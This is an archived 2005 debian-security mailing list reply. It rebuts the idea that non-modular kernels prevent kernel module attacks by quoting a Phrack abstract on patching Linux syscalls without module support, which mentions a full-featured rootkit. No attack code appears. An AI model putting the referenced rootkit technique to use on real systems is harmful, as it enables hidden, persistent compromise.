Re: Kernel security advice

To: debian-security@lists.debian.org
Subject: Re: Kernel security advice
From: Rick Moen <rick@linuxmafia.com>
Date: Fri, 18 Feb 2005 10:15:44 -0800
Message-id: <[🔎] 20050218181544.GD7141@linuxmafia.com>
In-reply-to: <[🔎] 20050218060740.GL27881@cia.net.au>
References: <[🔎] 65195.68.121.162.198.1108698673.squirrel@68.121.162.198> <[🔎] 20050218060740.GL27881@cia.net.au>

Quoting campbellm@cia.com.au (campbellm@cia.com.au):

> I like using non-modular kernels to prevent LKMs

http://www.phrack.org/phrack/58/p58-0x07

  In this paper, we will discuss way of abusing the Linux kernel
  (syscalls mostly) without help of module support or System.map at all,
  so that we assume that the reader will have a clue about what LKM is,
  how a LKM is loaded into kernel etc. If you are not sure, look at some
  documentation (paragraph 6. [1], [2], [3])

  Imagine a scenario of a poor man which needs to change some interesting
  linux syscall and LKM support is not compiled in. Imagine he have got a
  box, he got root but the admin is so paranoid and he (or tripwire) don't
  poor man's patched sshd and that box have not gcc/lib/.h
  needed for compiling of his favourite LKM rootkit. So there are
  some solutions, step by step and as an appendix, a full-featured
  linux-ia32 rootkit, an example/tool, which implements all the techinques
  described here.  [...]

Reply to:

References:
- Kernel security advice
  - From: "JM" <jmm19@humboldt.edu>
- Re: Kernel security advice
  - From: campbellm@cia.com.au

Prev by Date: Re: Kernel security advice
Next by Date: Re: using sarge on production machines
Previous by thread: Re: Kernel security advice
Next by thread: Re: Kernel security advice
Index(es):
- Date
- Thread